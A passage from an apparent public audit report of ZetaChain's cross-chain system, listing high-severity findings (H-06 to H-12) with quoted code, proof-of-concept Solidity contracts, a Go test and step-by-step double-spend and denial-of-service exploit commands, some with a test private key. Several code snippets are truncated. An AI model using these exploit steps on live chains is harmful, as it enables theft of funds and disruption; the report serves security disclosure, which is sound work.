As a result of this issue, the recipient of the cctx receives Zeta tokens instead of the lower-valued ERC-20 tokens, effectively stealing Zeta tokens for profit. Moreover, if users attempt to withdraw gas or ERC-20 tokens that have a higher value than the Zeta token, users will receive a total value Zeta tokens less than their original gas/ERC-20 tokens, resulting in a loss.

Consider refactoring the control flow by first checking if outbound transactions are enabled (the CoinType_Cmd cctx can be exempted from this check), and only then continue with the other checks.

lumtis (ZetaChain) confirmed

[H-06] zEVM cross-chain messages ignore the user-specified message and prevent calling the destination contract

Submitted by berndartmueller, also found by MevSec

Cross-chain Zeta messages originating from the zEVM have an empty message field, preventing the destinationAddress contract from being called.

This renders the cross-chain messaging functionality useless as the message is never used and potentially causes a loss of funds (if assets have been burned on the zEVM) or locked funds (if unable to unlock on the receiver end).

Proof of Concept

zEVM transactions are post-processed in the PostTxProcessing function of the x/crosschain module. Specifically, the goal is to parse and process ZetaSent and ZRC-20 Withdrawal events and send them to the corresponding, external receiver chains.

Any emitted ZetaSent events are parsed and processed in the ProcessZetaSentEvent function. This event is emitted by the ZetaConnectorZEVM.send function to send a cross-chain message to an external chain.

The message input, ZetaInterfaces.SendInput, allows the sender to specify a message that is forwarded to the receiver contract (destinationAddress) on the destination chain.

Specifically, once the cross-chain message is received by the onReceive function of the ZetaConnector contract on the receiver chain (e.g., ZetaConnectorEth or ZetaConnectorNonEth), the destinationAddress’s onZetaMessage function is called and the message is provided as a parameter.

However, the user-specified message is not used, instead, it is overwritten by an empty string in line 221.

172: func (k Keeper) ProcessZetaSentEvent(ctx sdk.Context, event *connectorzevm.ZetaConnectorZEVMZetaSent, emittingContract ethcommon.Address, txOrigin string) error {
...  	// [...]
213: 	// Bump gasLimit by event index (which is very unlikely to be larger than 1000) to always have different ZetaSent events msgs.
214: 	msg := types.NewMsgVoteOnObservedInboundTx(
215: 		"",
216: 		emittingContract.Hex(),
217: 		senderChain.ChainId,
218: 		txOrigin, toAddr,
219: 		receiverChain.ChainId, /
220: 		amount,
221: ❌		"",
222: 		event.Raw.TxHash.String(),
223: 		event.Raw.BlockNumber,
224: 		90000,
225: 		common.CoinType_Zeta,
226: 		"",
227: 		event.Raw.Index,
228: 	)
229: 	sendHash := msg.Digest()
231: 	// Create the CCTX
232: 	cctx := k.CreateNewCCTX(ctx, msg, sendHash, tss.TssPubkey, types.CctxStatus_PendingOutbound, &senderChain, receiverChain)
...  	// [...]
246: }

As a result, the destination contract is never called as the message is empty.

Consider using the user-specified message instead of overwriting it with an empty string.

lumtis (ZetaChain) confirmed

[H-07] Outbound transactions that can not be broadcasted to an external EVM chain cause a Denial of Service of all outgoing transactions to this chain

Submitted by berndartmueller

Outgoing transactions to an external EVM chain can be maliciously blocked by crafting a cctx that can not be broadcasted, i.e., causing the RPC to error (with an error that is not handled in the HandleBroadcastError function).

For example, causing the intrinsic gas limit to exceed the provided gas limit (minimum 100k) prevents the transaction from being included in the EVM mempool and blocks the queue of pending outgoing transactions to this external chain.

This is non-recoverable and requires manual intervention and coordination of all validators (observers) to fix the blocking nonce.

Proof of Concept

Observers retry failed outbound transaction broadcasts for a maximum of 5 retries. Subsequently, in the last retry attempt, the for loop is exited in line 579 and the function execution is finished.

Please note that the HandleBroadcastError function in line 570 only handles certain RPC errors and otherwise, simply instructs a retry.

On the next ticker, the TryProcessOutTx function attempts to send this cctx again but continues to fail. As nonces on the external chain have to be sequential without gaps, any other transactions are blocked from being sent to this external chain.

562:// retry loop: 1s, 2s, 4s, 8s, 16s in case of RPC error
563:for i := 0; i < 5; i++ {
564:	logger.Info().Msgf("broadcasting tx %s to chain %s: nonce %d, retry %d", outTxHash, toChain, send.GetCurrentOutTxParam().OutboundTxTssNonce, i)
565:	// #nosec G404 randomness is not a security issue here
566:	time.Sleep(time.Duration(rand.Intn(1500)) * time.Millisecond) // FIXME: use backoff
567:	err := signer.Broadcast(tx)
568:	if err != nil {
569:		log.Warn().Err(err).Msgf("OutTx Broadcast error")
570:		retry, report := HandleBroadcastError(err, strconv.FormatUint(send.GetCurrentOutTxParam().OutboundTxTssNonce, 10), toChain.String(), outTxHash)
571:		if report {
572:			zetaHash, err := zetaBridge.AddTxHashToOutTxTracker(toChain.ChainId, tx.Nonce(), outTxHash, nil, "", -1)
573:			if err != nil {
574:				logger.Err(err).Msgf("Unable to add to tracker on ZetaCore: nonce %d chain %s outTxHash %s", send.GetCurrentOutTxParam().OutboundTxTssNonce, toChain, outTxHash)
575:			}
576:			logger.Info().Msgf("Broadcast to core successful %s", zetaHash)
577:		}
578:		if !retry {
579:			break
580:		}
581:		backOff *= 2
582:		continue
583:	}
584:	logger.Info().Msgf("Broadcast success: nonce %d to chain %s outTxHash %s", send.GetCurrentOutTxParam().OutboundTxTssNonce, toChain, outTxHash)
585:	zetaHash, err := zetaBridge.AddTxHashToOutTxTracker(toChain.ChainId, tx.Nonce(), outTxHash, nil, "", -1)
586:	if err != nil {
587:		logger.Err(err).Msgf("Unable to add to tracker on ZetaCore: nonce %d chain %s outTxHash %s", send.GetCurrentOutTxParam().OutboundTxTssNonce, toChain, outTxHash)
588:	}
589:	logger.Info().Msgf("Broadcast to core successful %s", zetaHash)
590:	break // successful broadcast; no need to retry

How to exploit

The EVM validates the incoming transaction to exclude transactions with basic errors, such as insufficient intrinsic gas, before being put into the mempool.

In regards to the intrinsic gas, a single non-zero byte of transaction data costs 16 gas, plus an additional flat fee of 21_000. For more details on how the intrinsic gas is calculated, see the EVM’s IntrinsicGas function.

If the transaction’s gas limit is insufficient to cover the intrinsic gas, the transaction will be rejected, and the RPC call will result in an error.

This fact can be exploited, e.g., by sending a Zeta cross-chain message from an external chain A to chain B via the ZetaConnectorEth.send function. Specifically, an attacker can provide a message, input.message, with a length that ultimately exceeds the maximum message limit of MaxMessageLength = 10240 (this maximum length is enforced in the MsgVoteOnObservedInboundTx message’s ValidateBasic function and prevents observers from sending such a message to ZetaChain as well as also preventing any further processing of the message in case it reaches ZetaChain).

As the maximum message length is not exceeded, the inbound transaction is sent to ZetaChain, and once it’s successfully voted upon, the resulting cctx is put into the pending queue of outgoing transactions.

Subsequently, observers will process the cctx and attempt to send the transaction to the external chain B by collectively signing and broadcasting the message to the chain.

Given that the provided message and its length is 7680 (please refer to the PoC below for details on how this value is chosen), the intrinsic gas cost is 7680 * 16 = 122880 + flat fee of 21k = ~144k and the transaction must have at least this amount of gas to be accepted by the RPC.

However, sending Zeta messages allows specifying an arbitrary (non-zero) destination gas limit, which is lower-bounded to 100_000.

Consequently, the gas limit can be forced to be set to 100k. Attempting to broadcast such a transaction to the EVM RPC will result in an error due to the validation of the intrinsic gas costs of ~144k and the insufficient provided gas of 100k.

Simple PoC

The following Solidity contract demonstrates how such a cross-chain message with the maximum message length of 10240 can be crafted:

Internally, the observer encodes the message to base64, thus increasing the length of the message by roughly a factor of 4/3. Consequently, to not exceed the maximum message length, the message length is set to 10240 * 3/4 = 7680 in Solidity.

contract ZetaChain is ZetaReceiver {
    ZetaConnector public connector = ZetaConnector(0x733aB8b06DDDEf27Eaa72294B0d7c9cEF7f12db9);
    IERC20 public zeta = IERC20(0xA8D5060feb6B456e886F023709A2795373691E63);

    function send(uint256 amount, uint256 gasLimit) external {
        uint256 length = 7680;

        bytes memory message = new bytes(length);
        // fill with non-zero data
        for (uint256 i = 0; i < length; i++) {
            message[i] = bytes1(uint8(1));

        ZetaInterfaces.SendInput memory input = ZetaInterfaces.SendInput(

        zeta.transferFrom(msg.sender, address(this), amount);
        zeta.approve(address(connector), amount);


Calling this send function on the custom deployed ZetaChain contract on Ethereum, with amount = 4e18 and gasLimit = 100_000, causes the ZetaSent event to be emitted and picked up by the observers.

Once the transaction is sent to ZetaChain and finalized, observers attempt to broadcast the transaction to the receiver chain but fail with the following RPC error:

ERR Broadcast error: nonce 3 chain chain_name:goerli_localnet chain_id:1337  outTxHash 0x749c4e60f0428ba4f558bfca892dca5ba70bc9542e26f1f978240eaf0d5d73fe; retrying... error="intrinsic gas too low"

Consider properly handling a repeatedly failed RPC call in the TryProcessOutTx function and ensure that such a blocked (pending) nonce can be fixed, i.e., assigned to another cctx that can be broadcasted.

Additionally, consider lowering the maximum message length or adjusting the minimum gas limit to ensure the intrinsic gas costs are covered.

lumtis (ZetaChain) confirmed

[H-08] Tombstoned observer can maliciously add a duplicate observer address resulting in forfeiting voting rewards of targeted observers

Submitted by berndartmueller, also found by kuprum and p0wd3r

  1. If the ObserverList contains duplicates, any newly created ballots will have duplicates in their VoterList. As a result, this prevents an observer from receiving voting rewards as the reward for the legitimate vote would be offset by the penalty received for missing the vote for the duplicate observer address (repeatedly voting for a ballot with the same address does not work).
  2. Removing an observer (e.g., due to the validator leaving the network or due to slashing) that has duplicates will only remove the first occurrence of the address in the list. See node/x/observer/keeper/hooks.go#L142. The other occurrences will remain in the list and allow the observer to continue to post new light-client block headers.

Proof of Concept

The MsgUpdateObserver message, handled in the UpdateObserver function, allows the admin or an (tombstoned) observer to update the observer address.

Internally, in line 36, the UpdateObserverAddress function is called to update the observer address in the ObserverMapper for each chain.

086: func (k Keeper) UpdateObserverAddress(ctx sdk.Context, oldObserverAddress, newObserverAddress string) {
087: 	observerMappers := k.GetAllObserverMappers(ctx)
088: 	for _, om := range observerMappers {
089: 		UpdateObserverList(om.ObserverList, oldObserverAddress, newObserverAddress)
090: 		k.SetObserverMapper(ctx, om)
091: 	}
092: }
094: func UpdateObserverList(list []string, oldObserverAddresss, newObserverAddress string) {
095: 	for i, observer := range list {
096: 		if observer == oldObserverAddresss {
097: 			list[i] = newObserverAddress
098: 		}
099: 	}
100: }

However, a tombstoned observer is able to maliciously add a duplicate observer to the list by specifying an observer address (NewObserverAddress) in the MsgUpdateObserver message that is already in the ObserverList list.

As a result, the ObserverList list contains duplicates.

For the specific impact, please refer to the Impact section.

Test Case

The following test case demonstrates how the tombstoned validator can add a duplicate observer address:

Test case (click to reveal)
func TestAddDuplicateObserver(t *testing.T) {
	k, ctx := keepertest.ObserverKeeper(t)
	srv := keeper.NewMsgServerImpl(*k)
	// #nosec G404 test purpose - weak randomness is not an issue here
	r := rand.New(rand.NewSource(9))

	// Set validator in the store
	validator := sample.Validator(t, r)
	validatorOther := sample.Validator(t, r)
	validatorOther.Status = stakingtypes.Bonded
	validatorNew := sample.Validator(t, r)
	validatorNew.Status = stakingtypes.Bonded
	k.GetStakingKeeper().SetValidator(ctx, validatorNew)
	k.GetStakingKeeper().SetValidator(ctx, validator)
	k.GetStakingKeeper().SetValidator(ctx, validatorOther)

	consAddress, err := validator.GetConsAddr()
	assert.NoError(t, err)
	k.GetSlashingKeeper().SetValidatorSigningInfo(ctx, consAddress, slashingtypes.ValidatorSigningInfo{
		Address:             consAddress.String(),
		StartHeight:         0,
		JailedUntil:         ctx.BlockHeader().Time.Add(1000000 * time.Second),
		Tombstoned:          true,
		MissedBlocksCounter: 1,

	chains := k.GetParams(ctx).GetSupportedChains()

	accAddressOfValidator, err := types.GetAccAddressFromOperatorAddress(validator.OperatorAddress)
	assert.NoError(t, err)

	accAddressOfOtherValidator, err := types.GetAccAddressFromOperatorAddress(validatorOther.OperatorAddress)
	assert.NoError(t, err)

	// newOperatorAddress, err := types.GetAccAddressFromOperatorAddress(validatorNew.OperatorAddress)
	// assert.NoError(t, err)

	count := uint64(0)
	for _, chain := range chains {
		k.SetObserverMapper(ctx, &types.ObserverMapper{
			ObserverChain: chain,
			ObserverList:  []string{accAddressOfValidator.String(), accAddressOfOtherValidator.String()},
		count += 2
	k.SetNodeAccount(ctx, types.NodeAccount{
		Operator: accAddressOfValidator.String(),

	k.SetLastObserverCount(ctx, &types.LastObserverCount{
		Count: count,

	_, err = srv.UpdateObserver(sdk.WrapSDKContext(ctx), &types.MsgUpdateObserver{
		Creator:            accAddressOfValidator.String(),
		OldObserverAddress: accAddressOfValidator.String(),
		NewObserverAddress: accAddressOfOtherValidator.String(),
		UpdateReason:       types.ObserverUpdateReason_Tombstoned,
	assert.NoError(t, err)
	acc, found := k.GetNodeAccount(ctx, accAddressOfOtherValidator.String())
	assert.True(t, found)
	assert.Equal(t, accAddressOfOtherValidator.String(), acc.Operator)

	mapper, _ := k.GetObserverMapper(ctx, chains[0])

	assert.ElementsMatch(t, mapper.ObserverList, []string{accAddressOfOtherValidator.String(),   accAddressOfOtherValidator.String()}) // @audit-info Duplicate observers

How to run this test case:

Copy-pase the test case into repos/node/x/observer/keeper/msg_server_update_observer_test.go and run with go test -v ./x/observer/keeper/msg_server_update_observer_test.go --run TestAddDuplicateObserver

Result: The test will pass.

Please note that an admin can also accidentally add duplicate observers, node/x/observer/keeper/msgserveradd_observer.go#L47

Consider checking in the UpdateObserverAddress function if the newObserverAddress is already in the list and return an error if it is.

lumtis (ZetaChain) confirmed

[H-09] Using unconfirmed UTXOs as inputs for transactions is vulnerable to griefing attacks

Submitted by berndartmueller, also found by ciphermarco

BTC transactions originating from the TSS address can be griefed by an attacker, preventing the TSS address from sending BTC transactions.

Proof of Concept

The Bitcoin client retrieves all UTXO’s for the TSS address with the FetchUTXOS function. Subsequently, the UTXO’s are used as inputs for outgoing cctx’s to cover the expenses of the transaction.

Concretely, the UTXOs are queried from the RPC by calling the ListUnspentMinMaxAddresses function in line 737. However, the first argument, the minimum number of confirmations, is set to 0.

File: bitcoin_client.go
711: func (ob *BitcoinChainClient) FetchUTXOS() error {
...  	// [...]
721: 	// get the current block height.
722: 	bh, err := ob.rpcClient.GetBlockCount()
723: 	if err != nil {
724: 		return fmt.Errorf("btc: error getting block height : %v", err)
725: 	}
726: 	maxConfirmations := int(bh)
728: 	// List unspent.
729: 	tssAddr := ob.Tss.BTCAddress()
730: 	address, err := btcutil.DecodeAddress(tssAddr, config.BitconNetParams)
731: 	if err != nil {
732: 		return fmt.Errorf("btc: error decoding wallet address (%s) : %s", tssAddr, err.Error())
733: 	}
734: 	addresses := []btcutil.Address{address}
736: 	// fetching all TSS utxos takes 160ms
737: ❌	utxos, err := ob.rpcClient.ListUnspentMinMaxAddresses(0, maxConfirmations, addresses)
...  	// [...]
759: }

As a result, the UTXOs returned by the RPC call include unconfirmed UTXOs, i.e., transaction outputs that are not yet confirmed by subsequent blocks.

Consequently, an attacker can craft a BTC transaction to the TSS address, with a low fee, and broadcast it to the network (the transaction outputs must match the range of UTXOs that will be used by the TSS address for the next transaction). While the transaction and its outputs are sitting unconfirmed in the mempool, the observer Bitcoin clients will retrieve these unconfirmed outputs as UTXOs.

The unconfirmed UTXOs are then used as inputs for outgoing TSS BTC transactions, which will also remain unconfirmed as long as the original transaction (from the attacker) remains unconfirmed. This can cause a halt in the outgoing BTC transactions from the TSS address.

Moreover, the attacker can replace the original transaction via the Replace-by-fee (RBF) policy, and change the recipient address to an address other than the TSS address. This will render the UTXOs used as inputs for the TSS’s outgoing transaction invalid, causing the outgoing transaction to fail.

Comparing ZetaChain’s UTXO retrieval mechanism with Thorchain’s implementation, the latter treats unconfirmed UTXOs separately by checking if the UTXO was self-sent or sent from the Asgard address:


if item.Confirmations == 0 {
  // pending tx in mempool, only count sends to self or from asgard
  if !c.isSelfTransaction(item.TxID) && !c.isAsgardAddress(item.Address) {


// isSelfTransaction check the block meta to see whether the transactions is broadcast by ourselves
// if the transaction is broadcast by ourselves, then we should be able to spend the UTXO even it is still in mempool
// as such we could daisy chain the outbound transaction
func (c *Client) isSelfTransaction(txID string) bool {
	bms, err := c.temporalStorage.GetBlockMetas()
	if err != nil {
		c.logger.Err(err).Msg("fail to get block metas")
		return false
	for _, item := range bms {
		for _, tx := range item.SelfTransactions {
			if strings.EqualFold(tx, txID) {
				c.logger.Debug().Msgf("%s is self transaction", txID)
				return true
	return false

Consider only using unconfirmed UTXOs as inputs for outgoing transactions if the UTXOs were sent from the TSS address, similar to Thorchain’s implementation.

lumtis (ZetaChain) confirmed

[H-10] In ZetaTokenConsumerTrident.strategy.sol, swapping zeta for other tokens will always revert due to incorrect exactInputSingle router method being used

Submitted by oakcobalt (1, 2)

Swapping zeta for other tokens through getZetaFromToken() will always revert in ZetaTokenConsumerTrident.strategy.sol, due to calling the incorrect exactInputSingle router method.

Proof of Concept

In ZetaTokenConsumerTrident.strategy.sol, when swapping other tokens for zetaToken, getZetaFromToken() will be called and the function will first transfer inputToken from caller and approve tridentRouter to spend inputTokenAmount. Then it will call tridentRouter.exactInputSingle(params) for tridentRouter to execute token swap.

However, exactInputSingle() is the incorrect function for the use case and will always revert. In current TridentRouter.sol implementation, bento balance will be called to transfer from ZetaTokenConsumerTrident.strategy.sol first, but ZetaTokenConsumerTrident.strategy.sol doesn’t have means to deposit into bento, neither will it approve TridentRouter to manage it’s bento tokens.

    function getZetaFromToken(
        address destinationAddress,
        uint256 minAmountOut,
        address inputToken,
        uint256 inputTokenAmount
    ) external override returns (uint256) {
        IERC20(inputToken).safeTransferFrom(msg.sender, address(this), inputTokenAmount);
        IERC20(inputToken).safeApprove(address(tridentRouter), inputTokenAmount);
        (address token0, address token1) = getPair(zetaToken, WETH9Address);
        address[] memory pairPools = poolFactory.getPools(token0, token1, 0, 1);
        IPoolRouter.ExactInputSingleParams memory params = IPoolRouter.ExactInputSingleParams({
            tokenIn: zetaToken,
            amountIn: zetaTokenAmount,
            amountOutMinimum: minAmountOut,
            pool: pairPools[0],
            to: destinationAddress,
            unwrap: true
        //@audit tridentRouter.exactInputSingle will not transfer inputToken, but only tries to transfer bento shares which this contract has no means to deposit nor approve. This will cause transaction revert.
|>      uint256 amountOut = tridentRouter.exactInputSingle(params);


    function exactInputSingle(ExactInputSingleParams calldata params) public payable returns (uint256 amountOut) {
        // Prefund the pool with token A.
//@audit this modifies bento shares balances, not the actual inputToken balance
|>      bento.transfer(params.tokenIn, msg.sender, params.pool, params.amountIn);
        // Trigger the swap in the pool.
        amountOut = IPool(params.pool).swap(params.data);
        // Ensure that the slippage wasn't too much. This assumes that the pool is honest.
        if (amountOut < params.amountOutMinimum) revert TooLittleReceived();
//@audit allowed(from) modifier will check approval allowance for caller to manage bento shares, in this case, caller will be TridentRouter, and from will be ZetaTokenConsumerTrident.strategy.sol. 
    function transfer(
        IERC20 token,
        address from,
        address to,
        uint256 share
    ) public allowed(from) {
        // Checks
        require(to != address(0), "BentoBox: to not set"); // To avoid a bad UI from burning funds

        // Effects
|>      balanceOf[token][from] = balanceOf[token][from].sub(share);
        balanceOf[token][to] = balanceOf[token][to].add(share);

        emit LogTransfer(token, from, to, share);

As seen above, tridentRouter.exactInputSingle() will try to modify bento shares of inputToken, instead of the actual raw erc-20, causing the transaction to revert. Any transactions or flows that involve getZetaFromToken() will fail.

In ZetaTokenConsumerTrident.strategy.sol getZetaFromToken(), use tridentRouter.exactInputSingleWithNativeToken() instead, which is designed to handle raw ERC-20 token and will deposit into Bento on behalf of ZetaTokenConsumerTrident.strategy first and then perform the swap.

lumtis (ZetaChain) disputed and commented:

We no longer use this contract as Klaytn is not supported anymore

0xean (Judge) commented:

Screenshot 2024-01-07 at 3 44 26 PM

@lumtis While that may be the case, it was included in the audit scope as far as I can tell. Unless this is documented somewhere that I am missing the report is still valid and should be awarded (the warden did work based on the pre-determined scope of the audit).

[H-11] Outbound Confirmation Tracker Race Condition Leads to a Double Spend

Submitted by ChristiansWhoHack



In the Zellic audit, the report 3.2 Bonded validators can trigger reverts for successful transactions points out that the RemoveFromOutTxTracker can be called by any bonded validator. They mention this as being an issue then mention an exploit path to use, which is the focus of that finding. The RemoveFromOutTxTracker issue resulting from bad access control issue was remediated, however there is another way to use the same exploit.

Their method of exploitation is as follows:

  1. Create a CCTX from one EVM chain to a different EVM chain, transferring ZETA
  2. Process the incoming event so that it’s put into the PendingOutbound state.
  3. The zetaclient signs the transaction with the TryProcessOutTx then broadcasts this to the EVM. Right after the voting, the zetaclient will also add the transaction to the OutboundTxTracker.
  4. Call RemoveFromOutTxTracker to remove the outbound transaction so that the Zetaclient will never see it. While this exact method is fixed, we can replicate the removal with a race condition that will be described below.
  5. Call AddToOutTxTracker where the same nonce as the transaction from the TSS address. Make this a reverted transaction so that we trick the processing to eventually call onRevert.
  6. observeTxOut picks up the FAKE transaction as being reverted, even though it actually succeeded. This will put the tx into the ob.outTXConfirmationTransaction and ob.outTXConfirmationReceipts structure.
  7. With the transactions and receipt in the structures, another thread calls PostReceiveConfirmation on our fake transaction as being reverted. After enough of these, a vote passes that validates that the transaction did in fact fail.
  8. The revert flow will occur. This will send us back the funds on the EVM chain even though they were already sent once in the original transaction.

By adding a reverted transaction to the OutTxTracker at just the right moment, it is possible to cause a race condition where the real transaction is broadcasted to the outbound chain but the wrong tx is processed through the queue for the OutTracker. This is able to replicate the effect of step 4 of the Zellic method, since we can get our fake transaction processed first in the voting process. The timing for performing a double spend is very tight though. In particular, the function must be within the signing process of our CCTX but has NOT added the TX to the outbound queue yet when we add the function to the OutTxTracker. If this is done, a double spend will occur. However, causing a denial of service by sending the fake transaction as soon as possible is trivial. We were able to replicate the double spend a few times but got the denial of service every time. The double spend has a video below since it is hard to trigger.

The real issue stems from the items going into the ob.outTXConfirmationTransaction and ob.outTXConfirmationReceipts structure without the events ever being validated properly. Additionally, only the first item within a given OutTxTracker is ever used. The only item that is validated on the processing is that the nonce of the transaction matches the nonce of the TSS CCTX. However, this is trivial to bypass using a different key.

Another interesting point is who can trigger the vulnerability. For testing, we mostly used an observer because we never got the proof functionality working. To our understanding, this provides three checks:

  • The To() must be to the connector address.
  • The block header for the TX must be uploaded. This means that the confirmation point must be reached.
  • The TX must be valid and occurred.

All of these are trivial to bypass. First, we simply send a transaction to the connector that fails for whatever reason, which satisfies part 1. Part 2 can be bypassed by simply waiting for enough blocks on our fake transaction. Part 3 can be bypassed by using a valid proof, which should be easy to do.

All of this together means that any user can exploit the double spend but it’s much easier for observers to do, since no proof is required. This was only tested on Ethereum but may also work on Bitcoin as well. This vulnerability is live on the existing system.

Proof of Concept


The setup for exploitation on this is complicated within the test environment. Messing up a single step will make this not work. If there is difficultly in reproducing, please reach out and we can demonstrate it. Here is a video of the exploit occurring as well.

  • Easy way to get ZETA for testing. This is shown in the steps below.
  • An account that is at the same nonce as the TSS address. Be careful of off by 1 errors here, as cast from foundry shows the NEXT nonce and not the nonce of the previous transaction.

To demonstrate the exploitabilty of this, we will show the denial of service to block an incoming transaction. Additionally, we will use the observer instead of a regular user so that we do not have to specify proofs. However, this can be used for a double spend by any user, given the proper timing and proof. It is recommended to read the steps ahead of time because the timing of everything is crucial. To make this easier, prepare the commands in a terminal to be ready to go.

Exploit Steps for DoS

  1. Get the nonce of the next CCTX. This can be done using the zetacored binary. A command with zetacored and jq is used below: zetacored query crosschain list-chain-nonces -o json | jq ‘.ChainNonces[] | select(.chain_id == “1337”) | .nonce’ -r
  2. Using some private key, get a transaction to fail using the same nonce as the TSS address above. There is a security check that we need to bypass using this. To do this, I deployed the following contract and called it multiple times until the reverted transaction matched the nonce. Keep the hash that reverted for later. contract ForcedRevert { function revertMe() external { revert(“Bad!”); } }
  3. Deploy the following contract. The ZetaInteractor and ZetaReceiver interfaces can be imported or copied in. For our testing, we mostly used Remix so we copied the necessary contracts in.
    contract DoubleSpend is ZetaInteractor, ZetaReceiver {

        IERC20 _zetaToken;
        uint256 public calledMessage = 0;
        uint256 public calledRevert = 0;
        bytes32 public constant CROSS_CHAIN_MESSAGE_MESSAGE_TYPE =

        // 0x733aB8b06DDDEf27Eaa72294B0d7c9cEF7f12db9, 0xA8D5060feb6B456e886F023709A2795373691E63
            address connectorAddress,
            address zetaTokenAddress
        ) ZetaInteractor(connectorAddress) {
            _zetaToken = IERC20(zetaTokenAddress);

        function onZetaMessage(ZetaInterfaces.ZetaMessage calldata zetaMessage) external override{
            calledMessage += 1; 

        function onZetaRevert(ZetaInterfaces.ZetaRevert calldata zetaRevert) external override{
            calledRevert += 1;

        function TriggerBug () public payable{
            uint256 destinationChainId = 1337;
            uint256 zetaValueAndGas = _zetaToken.balanceOf(address(this)) / 4; 

            _zetaToken.approve(address(connector), zetaValueAndGas);
            // Make the CCTX
                    destinationChainId: destinationChainId,
                    destinationAddress: abi.encodePacked(address(this)), // Send to ourselves
                    destinationGasLimit: 300000,
                    message: abi.encode(CROSS_CHAIN_MESSAGE_MESSAGE_TYPE, "Hey!"),
                    zetaValueAndGas: zetaValueAndGas,
                    zetaParams: abi.encode("")
  1. Give the contract 50 ZETA for the test. An easy way to do this is using the admin private key to change the TSS address of the user to itself then sending the ZETA.

    ## Update the TSS to a controlled user 
    cast send 0x733aB8b06DDDEf27Eaa72294B0d7c9cEF7f12db9 "function updateTssAddress(address tssAddress_)" 0xE5C5367B8224807Ac2207d350E60e1b6F27a7ecC --private-key d87baf7bf6dc560a252596678c12e41f7d1682837f05b29d411bc3f78ae2c263
    ## Call to change the information there 
    cast send 0x733aB8b06DDDEf27Eaa72294B0d7c9cEF7f12db9 "function onReceive(bytes calldata zetaTxSenderAddress, uint256 sourceChainId, address destinationAddress, uint256 zetaValue, bytes calldata message,bytes32 internalSendHash)" "" 1337 <CONTRACT_ADDRESS> 50000000000000000000 "" 0x0000000000000000000000000000000000000000000000000000000000000001 --private-key d87baf7bf6dc560a252596678c12e41f7d1682837f05b29d411bc3f78ae2c263
    # Update back in the TSS address
    cast send 0x733aB8b06DDDEf27Eaa72294B0d7c9cEF7f12db9 "function updateTssAddress(address tssAddress_)" <TSS_ETH_KEY> --private-key d87baf7bf6dc560a252596678c12e41f7d1682837f05b29d411bc3f78ae2c263
  2. Execute the function TriggerBug() with the address of the deployed contract. This will trigger the CCTX that we need to exploit this issue.
  3. Wait for the transaction to be in the PendingOutbound state. This can be queried using the command zetacored query crosschain list-pending-cctx 1337.
  4. As soon as the transaction goes into the PendingOutbound state, add it to the OutTracker queue. It is super important that our transaction is added BEFORE the real one is put in by the zetaclient. This is because the first transaction in the queue is the first one processed. To attempt a double spend, change the timing to be slightly later. We found that 5 seconds seems like the magic number but it was very inconsistent. An example command to add the hash to the queue is shown below:

    zetacored tx crosschain add-to-out-tx-tracker 1337 <TSS NONCE> <HASH> --from `zetacored keys list --output json | jq '.[0].address' -r` --yes --fees 10000azeta
  5. Wait for the transaction to finish. To view pending transaction use the command zetacored query crosschain list-pending-cctx 1337.
  6. Query all CCTXs to see the status of the TX. This can be done with the following command to search for a given nonce:

    zetacored query crosschain list-cctx 1337 -o json | jq '.CrossChainTx[] | select(.outbound_tx_params[0].outbound_tx_tss_nonce == "<NONCE>")'
  7. Notice that the “status” of the transaction is reverted with TWO outbound params instead of one. This indicates that we were able to set the state of the transaction, even though it was the wrong one. Sometimes, doing this can stop the environment from working or get transactions stuck as well. This all depends on the timing in which this occurred.
      "cctx_status": {
        "status": "Reverted",
  1. If you were going for the double spend, check the balance of the contract and notice that it is larger than the balance before. A video of the double spend being explained can used as well.


The crux of the original issue was not the bad permissions of the RemoveFromOutTxTracker message but certainly makes it much easier to exploit. To remediate this, we need to fix the underlying problem of the Zellic exploit method.

The ob.outTXConfirmationTransaction and ob.outTXConfirmationReceipts variables do not validate the events associated with the transaction hash. There is an assumption that the transaction hash presented matches the nonce that was provided, which is not necessarily true.

There are few things that need to be fixed. To prevent the double spend by tricking the program to see a reverted transaction, the from of the TSS needs to be checked to be the tss address. Otherwise, it is possible to trick the processing to use the wrong transaction.

To prevent a denial of service using this technique is a bit more complicated. Currently, the first of the item put into the OutTxTracker is the one that will be processed as the proper one. This is because once the ob.outTXConfirmationTransaction and ob.outTXConfirmationReceipts objects are set, they cannot be updated. Iterating over all of the items in the list would remediate this issue. It would require some rework of the program in order to do though.

This still may be insufficient but we couldn’t find a workaround for these. The usage of the multi-threaded code makes this very hard to follow. It is recommended that the Zetachain team takes a long look at how this works to ensure there aren’t other exploit methods.

lumtis (ZetaChain) confirmed

[H-12] Inconsistent Voting Index Leads to Double Spends in Future

Submitted by ChristiansWhoHack



The voting process works as follows:

  1. An observer sees an event and sends a message to Zetachain to vote on the occurrence.
  2. The message structure is hashed to determine the ballot to be used.
  3. The vote is added based upon the hashed value.
  4. If enough votes have been received, then the finalization occurs. This means relaying to the zEVM or another chain.

The index of an observed transaction MsgVoteOnObservedInboundTx is calculated by taking a hash of the incoming message. For every observer that votes on a given event, the index should be the same. The protection in place for stopping duplicate transactions is simply checking if this index has occurred already. Since the ballots are never deleted, this works well.

However, the index is too granular. Many aspects of an event are guaranteed to not change: sender/receiver change, tx hash, amount, cointype, etc. This is NOT the case with several of the fields that are hardcoded into the Zetaclient but may change in the future. Gaslimit (hardcoded in app) and asset (which is currently blank) are unused fields that may change in the future. On top of this, a change in encoding, what the zetaclient signs or anything else would result in a different hash as well.

Additionally, any newly added fields would change the index of previous ballots as well. If this sounds farfetched, there is already a case of this happening since deployment. The field eventIndex was added very recently to the repository, since multiple events can happen within a single transaction. If the current Zetachain deployment had the AddToInTxTracker then it would be possible to exploit the new eventIndex field changes the hash to retrigger the CCTX.

If any of these values change in the future, then the ballot index would change. Since this index is the only security protection for duplicate submissions, the same event could be submitted once again. To make matters worse, there is nothing within the TxInTracker on the zetachain or zetaclient that checks that an event has already occurred. This allows for trivial exploitation when the client or parts of the message are updated.

Relying on this index to never change is an unspoken variant now. Since this is not mentioned anywhere, a tiny change made by a developer would result in every CCTX previously created to be valid in the voting process once again. Although there is some waiting involved, a malicious adversary could send CCTXs and simply wait for them to be valid again once a change to the Zetachain or Zetaclient is made.

Attack strategy:

  1. Transfer BTC, ETH, ERC20 and Zeta between several different chains in large quantities.
  2. Wait for a change in one of the above fields to occur within the Zetaclient.
  3. Resubmit an old transaction into the TxInTracker with a proof. The zetaclient will see this and all observers will vote on the event occurrence.
  4. Massive profit from duplicate event submission. This can only be done once for very change on the fields. With enough sending of funds back and forth prior to the update, this could lead to massive profits for an attacker.

Proof of Concept

